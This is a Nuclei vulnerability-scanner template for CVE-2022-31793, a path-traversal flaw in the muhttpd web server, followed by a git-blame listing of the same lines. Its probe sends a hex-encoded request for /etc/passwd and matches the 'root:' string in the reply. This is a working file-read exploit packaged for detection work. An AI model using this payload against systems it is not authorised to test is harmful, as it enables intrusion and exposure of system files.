nuclei-templates/network/cves/2022/CVE-2022-31793.yaml

id: CVE-2022-31793

info:
  name: muhttpd <=1.1.5 - Local Inclusion
  author: scent2d
  severity: high
  description: |
    muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the system.
  remediation: Update the application to version 1.10
  reference:
    - https://derekabdine.com/blog/2022-arris-advisory.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31793
    - https://derekabdine.com/blog/2022-arris-advisory
    - https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/millions-of-arris-routers-are-vulnerable-to-path-traversal-attacks/
    - http://inglorion.net/software/muhttpd/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-31793
    cwe-id: CWE-22
    epss-score: 0.25241
    epss-percentile: 0.96539
    cpe: cpe:2.3:a:inglorion:muhttpd:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: inglorion
    product: muhttpd
  tags: network,cve,cve2022,muhttpd,lfi,unauth,inglorion
tcp:
  - host:
      - "{{Hostname}}"
    inputs:
      - data: "47455420612F6574632F706173737764"
        type: hex

      - data: "\n\n"
    read-size: 128
    matchers:
      - type: word
        part: body
        encoding: hex
        words:
          - "726f6f743a"
# digest: 4a0a004730450220552dea540450a6b50bb4fd1647d35646f4ddf95b681f33a3d832e169c3ee54a00221008959a00adc118b209a3e73b2598a4eafc401f50232ac399d121322f839f2a04c:922c64590222798bb761d5b6d8e72950
Create CVE-2022-31793.yaml 2022-07-31 11:26:56 +00:00			`id: CVE-2022-31793`

			`info:`
Dashboard Content Enhancements (#6526) Dashboard Content Enhancements 2023-01-16 17:41:15 +00:00			`name: muhttpd <=1.1.5 - Local Inclusion`
Create CVE-2022-31793.yaml 2022-07-31 11:26:56 +00:00			`author: scent2d`
Update CVE-2022-31793.yaml 2022-08-04 14:59:59 +00:00			`severity: high`
Create CVE-2022-31793.yaml 2022-07-31 11:26:56 +00:00			`description: \|`
Dashboard Content Enhancements (#6526) Dashboard Content Enhancements 2023-01-16 17:41:15 +00:00			`muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`An attacker can exploit this vulnerability to read sensitive files on the system.`
Updated network CVEs 2023-09-06 13:28:19 +00:00			`remediation: Update the application to version 1.10`
Create CVE-2022-31793.yaml 2022-07-31 11:26:56 +00:00			`reference:`
			`- https://derekabdine.com/blog/2022-arris-advisory.html`
Update CVE-2022-31793.yaml 2022-08-04 08:46:47 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2022-31793`
Auto Generated CVE annotations [Mon Jan 16 17:57:19 UTC 2023] :robot: 2023-01-16 17:57:19 +00:00			`- https://derekabdine.com/blog/2022-arris-advisory`
			`- https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/millions-of-arris-routers-are-vulnerable-to-path-traversal-attacks/`
network template enrichment 2023-07-16 13:29:08 +00:00			`- http://inglorion.net/software/muhttpd/`
Dashboard Content Enhancements (#5077) Dashboard Content Enhancements 2022-08-12 00:45:50 +00:00			`classification:`
Auto Generated CVE annotations [Fri Aug 12 17:57:05 UTC 2022] :robot: 2022-08-12 17:57:05 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
Dashboard Content Enhancements (#5077) Dashboard Content Enhancements 2022-08-12 00:45:50 +00:00			`cve-id: CVE-2022-31793`
Auto Generated CVE annotations [Fri Aug 12 17:57:05 UTC 2022] :robot: 2022-08-12 17:57:05 +00:00			`cwe-id: CWE-22`
TemplateMan Update [Mon Mar 4 08:20:22 UTC 2024] :robot: 2024-03-04 08:20:22 +00:00			`epss-score: 0.25241`
			`epss-percentile: 0.96539`
Added CPE and EPSS Score to CVE Templates 2023-04-12 10:55:48 +00:00			`cpe: cpe:2.3:a:inglorion:muhttpd::::::::`
Update CVE-2022-31793.yaml 2022-08-04 14:59:59 +00:00			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
Updated network CVEs 2023-09-06 13:28:19 +00:00			`max-request: 1`
network template enrichment 2023-07-16 13:29:08 +00:00			`vendor: inglorion`
			`product: muhttpd`
Revert "TemplateMan Update [Mon Apr 8 11:30:07 UTC 2024] :robot:" This reverts commit 433dda4ae5b824564b44075bb95a96ecdbe263a6. 2024-04-08 11:34:33 +00:00			`tags: network,cve,cve2022,muhttpd,lfi,unauth,inglorion`
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`tcp:`
Create CVE-2022-31793.yaml 2022-07-31 11:26:56 +00:00			`- host:`
Update CVE-2022-31793.yaml Update error YAML Lint #16809 2022-07-31 13:50:22 +00:00			`- "{{Hostname}}"`
Create CVE-2022-31793.yaml 2022-07-31 11:26:56 +00:00			`inputs:`
Update CVE-2022-31793.yaml Update error YAML Lint #16809 2022-07-31 13:50:22 +00:00			`- data: "47455420612F6574632F706173737764"`
Create CVE-2022-31793.yaml 2022-07-31 11:26:56 +00:00			`type: hex`

network template enrichment 2023-07-16 13:29:08 +00:00			`- data: "\n\n"`
Create CVE-2022-31793.yaml 2022-07-31 11:26:56 +00:00			`read-size: 128`
			`matchers:`
			`- type: word`
Update CVE-2022-31793.yaml 2022-08-04 14:59:59 +00:00			`part: body`
Create CVE-2022-31793.yaml 2022-07-31 11:26:56 +00:00			`encoding: hex`
			`words:`
Update CVE-2022-31793.yaml Update error YAML Lint #16809 2022-07-31 13:50:22 +00:00			`- "726f6f743a"`
Auto Template Signing [Mon Mar 4 09:35:31 UTC 2024] :robot: 2024-03-04 09:35:31 +00:00			`# digest: 4a0a004730450220552dea540450a6b50bb4fd1647d35646f4ddf95b681f33a3d832e169c3ee54a00221008959a00adc118b209a3e73b2598a4eafc401f50232ac399d121322f839f2a04c:922c64590222798bb761d5b6d8e72950`